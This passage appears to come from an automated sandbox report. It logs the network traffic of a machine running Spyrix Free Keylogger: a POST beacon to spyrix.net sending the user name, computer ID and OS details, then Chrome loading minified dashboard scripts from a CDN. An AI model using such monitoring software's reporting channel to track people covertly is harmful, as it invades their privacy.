                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC166OUTPOST /dashboard/prg-actions HTTP/1.1
                                                                                                                                                                                                                                                          Host: spyrix.net
                                                                                                                                                                                                                                                          User-Agent: curl/7.64.0
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Content-Length: 419
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC419OUTData Raw: 26 61 63 74 69 6f 6e 3d 61 70 70 3a 77 69 7a 61 72 64 3a 53 74 61 72 74 26 64 61 74 61 3d 26 70 72 67 5f 69 64 3d 53 70 79 72 69 78 20 46 72 65 65 20 4b 65 79 6c 6f 67 67 65 72 26 70 72 67 5f 76 65 72 3d 31 31 2e 36 2e 32 32 26 75 73 65 72 5f 6e 61 6d 65 3d 66 72 6f 6e 74 64 65 73 6b 26 75 73 65 72 3d 26 63 6f 6d 70 5f 6e 61 6d 65 3d 33 37 37 31 34 32 26 63 6f 6d 70 5f 69 64 3d 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5f 32 34 31 30 30 32 30 31 35 36 32 35 26 63 6f 6d 70 5f 74 69 6d 65 3d 32 30 32 34 2d 31 30 2d 30 32 20 30 31 3a 35 38 3a 34 34 2e 35 38 31 26 70 72 67 5f 6c 6e 67 3d 65 6e 67 6c 69 73 68 26 6f 73 5f 63 61 70 74 69 6f 6e 3d 20 28 29 26 6f 73 5f 74 79 70 65 3d 77 69 6e 64 6f
                                                                                                                                                                                                                                                          Data Ascii: &action=app:wizard:Start&data=&prg_id=Spyrix Free Keylogger&prg_ver=11.6.22&user_name=user&user=&comp_name=377142&comp_id=9e146be9-c76a-4720-bcdb-53011b87bd06_241002015625&comp_time=2024-10-02 01:58:44.581&prg_lng=english&os_caption= ()&os_type=windo
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC170INHTTP/1.1 201 Created
                                                                                                                                                                                                                                                          Server: nginx/1.17.3
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:29 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          33192.168.2.75504495.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC574OUTGET /dashboard30/assets/index-7e7c447a.css HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                          Referer: https://dashboard.spyrix.com/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC303INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:29 GMT
                                                                                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                                                                                          Content-Length: 296
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-128"
                                                                                                                                                                                                                                                          Cache: STALE
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T00:25:29+00:00
                                                                                                                                                                                                                                                          X-Node: m9p-up-gc30
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC296INData Raw: 2e 4d 57 50 51 46 4d 6b 54 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 52 6a 7a 66 61 76 36 4e 2c 2e 64 38 4e 55 4e 65 49 6b 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 7d 2e 63 44 44 52 65 5a 2d 6b 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 67 61 70 3a 31 30 70 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 7d 2e 6c 51
                                                                                                                                                                                                                                                          Data Ascii: .MWPQFMkT{display:flex;flex-direction:column;align-items:center;justify-content:center}.Rjzfav6N,.d8NUNeIk{margin-bottom:10px}.cDDReZ-k{width:100%;display:flex;flex-direction:column;gap:10px;justify-content:center;align-items:center;margin-bottom:20px}.lQ


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          34192.168.2.75504395.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC594OUTGET /dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC391INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:29 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 733
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-2dd"
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          Cache: STALE
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T02:04:56+00:00
                                                                                                                                                                                                                                                          X-Node: m9p-up-gc30
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC733INData Raw: 69 6d 70 6f 72 74 7b 45 20 61 73 20 75 2c 73 20 61 73 20 6c 2c 61 74 20 61 73 20 69 2c 70 20 61 73 20 6d 2c 64 20 61 73 20 6f 2c 6f 20 61 73 20 72 2c 62 20 61 73 20 5f 2c 72 20 61 73 20 70 2c 6e 20 61 73 20 66 2c 75 20 61 73 20 63 2c 67 2c 65 20 61 73 20 64 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 30 30 34 66 34 30 32 35 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 63 20 61 73 20 68 7d 66 72 6f 6d 22 2e 2f 43 6f 6e 66 69 72 6d 50 68 6f 6e 65 4d 6f 64 61 6c 2e 6d 6f 64 75 6c 65 2d 33 66 33 36 39 62 33 32 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 5f 20 61 73 20 45 7d 66 72 6f 6d 22 2e 2f 54 65 78 74 2e 76 75 65 5f 76 75 65 5f 74 79 70 65 5f 73 63 72 69 70 74 5f 73 65 74 75 70 5f 74 72 75 65 5f 6c 61 6e 67 2d 61 36 36 34 35 34 32 64 2e 6a 73 22 3b 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                                          Data Ascii: import{E as u,s as l,at as i,p as m,d as o,o as r,b as _,r as p,n as f,u as c,g,e as d}from"./index-004f4025.js";import{c as h}from"./ConfirmPhoneModal.module-3f369b32.js";import{_ as E}from"./Text.vue_vue_type_script_setup_true_lang-a664542d.js";function


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          35192.168.2.75504695.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC562OUTGET /dashboard30/assets/Button.module-6d4e91b8.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC389INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:29 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 629
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-275"
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:11:42+00:00
                                                                                                                                                                                                                                                          X-Node: m9p-up-gc30
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC629INData Raw: 63 6f 6e 73 74 20 65 3d 22 67 31 6a 44 45 4e 75 51 22 2c 6f 3d 22 6b 6e 33 2d 6a 70 61 38 22 2c 64 3d 22 70 69 31 61 53 67 71 4e 22 2c 72 3d 22 59 78 32 6d 49 6a 4e 35 22 2c 6e 3d 22 47 51 54 58 6e 50 56 68 22 2c 73 3d 22 53 70 74 36 4f 6f 39 41 22 2c 63 3d 22 52 6d 44 6c 44 74 50 31 22 2c 74 3d 22 6e 4c 49 47 57 42 32 6b 22 2c 6c 3d 22 49 65 50 78 6f 4f 71 53 22 2c 69 3d 22 41 55 6d 76 4e 54 7a 36 22 2c 61 3d 22 5f 36 76 58 51 70 6d 51 44 22 2c 6d 3d 22 71 33 56 30 32 46 68 36 22 2c 62 3d 22 53 4a 30 47 50 63 38 65 22 2c 79 3d 22 5f 35 56 65 61 78 45 64 39 22 2c 70 3d 22 63 4b 66 79 68 4a 71 2d 22 2c 68 3d 22 47 77 2d 6c 36 37 79 4d 22 2c 75 3d 22 58 6a 4a 4d 4f 6a 4b 46 22 2c 78 3d 22 57 5a 68 5a 2d 5a 4b 4c 22 2c 50 3d 22 65 49 48 36 65 73 68 57 22 2c
                                                                                                                                                                                                                                                          Data Ascii: const e="g1jDENuQ",o="kn3-jpa8",d="pi1aSgqN",r="Yx2mIjN5",n="GQTXnPVh",s="Spt6Oo9A",c="RmDlDtP1",t="nLIGWB2k",l="IePxoOqS",i="AUmvNTz6",a="_6vXQpmQD",m="q3V02Fh6",b="SJ0GPc8e",y="_5VeaxEd9",p="cKfyhJq-",h="Gw-l67yM",u="XjJMOjKF",x="WZhZ-ZKL",P="eIH6eshW",


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          36192.168.2.75504795.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC570OUTGET /dashboard30/assets/ButtonTemplate.module-c837805f.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC387INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:29 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 129
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-81"
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T03:50:38+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc70
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC129INData Raw: 63 6f 6e 73 74 20 74 3d 22 5f 36 70 74 63 2d 76 31 6f 22 2c 6f 3d 22 65 54 55 74 31 76 53 4d 22 2c 63 3d 7b 22 62 75 74 74 6f 6e 2d 74 65 6d 70 6c 61 74 65 22 3a 22 5f 36 70 74 63 2d 76 31 6f 22 2c 62 75 74 74 6f 6e 54 65 6d 70 6c 61 74 65 3a 74 2c 22 77 69 74 68 2d 69 63 6f 6e 22 3a 22 65 54 55 74 31 76 53 4d 22 2c 77 69 74 68 49 63 6f 6e 3a 6f 7d 3b 65 78 70 6f 72 74 7b 63 7d 3b 0a
                                                                                                                                                                                                                                                          Data Ascii: const t="_6ptc-v1o",o="eTUt1vSM",c={"button-template":"_6ptc-v1o",buttonTemplate:t,"with-icon":"eTUt1vSM",withIcon:o};export{c};


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          37192.168.2.75504595.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC566OUTGET /dashboard30/assets/ButtonText.module-c769b9ae.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC387INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:29 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 120
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-78"
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T03:50:39+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc70
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC120INData Raw: 63 6f 6e 73 74 20 74 3d 22 76 61 4a 67 37 58 47 66 22 2c 6f 3d 22 6d 74 78 46 75 75 71 6f 22 2c 6e 3d 22 4d 74 41 55 6d 34 72 64 22 2c 78 3d 7b 22 62 75 74 74 6f 6e 2d 74 65 78 74 22 3a 22 76 61 4a 67 37 58 47 66 22 2c 62 75 74 74 6f 6e 54 65 78 74 3a 74 2c 74 65 78 74 3a 6f 2c 70 72 69 6d 61 72 79 3a 6e 7d 3b 65 78 70 6f 72 74 7b 78 20 61 73 20 63 7d 3b 0a
                                                                                                                                                                                                                                                          Data Ascii: const t="vaJg7XGf",o="mtxFuuqo",n="MtAUm4rd",x={"button-text":"vaJg7XGf",buttonText:t,text:o,primary:n};export{x as c};


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          38192.168.2.75504995.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC561OUTGET /dashboard30/assets/Modal.module-d62c47b8.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC389INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:29 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 1392
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-570"
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:11:42+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc58
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC1392INData Raw: 69 6d 70 6f 72 74 7b 61 75 20 61 73 20 6e 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 30 30 34 66 34 30 32 35 2e 6a 73 22 3b 63 6f 6e 73 74 20 72 3d 28 65 2c 6f 2c 74 29 3d 3e 7b 73 77 69 74 63 68 28 6f 29 7b 63 61 73 65 22 69 6e 63 72 65 61 73 65 22 3a 72 65 74 75 72 6e 20 65 2e 73 6f 72 74 28 28 73 2c 61 29 3d 3e 73 5b 74 5d 3e 61 5b 74 5d 3f 31 3a 2d 31 29 3b 63 61 73 65 22 64 65 63 72 65 61 73 65 22 3a 72 65 74 75 72 6e 20 65 2e 73 6f 72 74 28 28 73 2c 61 29 3d 3e 73 5b 74 5d 3c 61 5b 74 5d 3f 31 3a 2d 31 29 7d 7d 2c 79 3d 6e 28 22 6d 6f 64 61 6c 22 2c 7b 73 74 61 74 65 3a 28 29 3d 3e 28 7b 6d 6f 64 61 6c 73 51 75 65 75 65 3a 5b 5d 7d 29 2c 67 65 74 74 65 72 73 3a 7b 69 73 41 63 74 69 76 65 41 6e 79 4d 6f 64 61 6c 28 65 29 7b 72 65 74 75 72 6e 21 21 65
                                                                                                                                                                                                                                                          Data Ascii: import{au as n}from"./index-004f4025.js";const r=(e,o,t)=>{switch(o){case"increase":return e.sort((s,a)=>s[t]>a[t]?1:-1);case"decrease":return e.sort((s,a)=>s[t]<a[t]?1:-1)}},y=n("modal",{state:()=>({modalsQueue:[]}),getters:{isActiveAnyModal(e){return!!e


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          39192.168.2.75504895.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC591OUTGET /dashboard30/assets/Button.vue_vue_type_script_setup_true_lang-56edf5a6.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC390INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:29 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 1185
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-4a1"
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:02:54+00:00
                                                                                                                                                                                                                                                          X-Node: m9p-up-gc69
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC1185INData Raw: 69 6d 70 6f 72 74 7b 64 20 61 73 20 70 2c 6f 20 61 73 20 6e 2c 62 20 61 73 20 69 2c 72 20 61 73 20 73 2c 66 20 61 73 20 75 2c 6e 20 61 73 20 64 2c 75 20 61 73 20 6c 2c 77 20 61 73 20 74 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 30 30 34 66 34 30 32 35 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 63 20 61 73 20 61 7d 66 72 6f 6d 22 2e 2f 42 75 74 74 6f 6e 2e 6d 6f 64 75 6c 65 2d 36 64 34 65 39 31 62 38 2e 6a 73 22 3b 63 6f 6e 73 74 20 66 3d 5b 22 74 79 70 65 22 2c 22 64 69 73 61 62 6c 65 64 22 2c 22 6f 6e 43 6c 69 63 6b 22 5d 2c 6d 3d 5b 22 6f 6e 43 6c 69 63 6b 22 5d 2c 6b 3d 70 28 7b 5f 5f 6e 61 6d 65 3a 22 42 75 74 74 6f 6e 22 2c 70 72 6f 70 73 3a 7b 73 69 7a 65 3a 7b 64 65 66 61 75 6c 74 3a 22 6d 64 22 7d 2c 76 61 72 69 61 6e 74 3a 7b 64 65 66 61 75 6c 74 3a 22
                                                                                                                                                                                                                                                          Data Ascii: import{d as p,o as n,b as i,r as s,f as u,n as d,u as l,w as t}from"./index-004f4025.js";import{c as a}from"./Button.module-6d4e91b8.js";const f=["type","disabled","onClick"],m=["onClick"],k=p({__name:"Button",props:{size:{default:"md"},variant:{default:"


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          40192.168.2.75505195.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC414OUTGET /dashboard30/assets/Text.vue_vue_type_script_setup_true_lang-a664542d.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC330INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:30 GMT
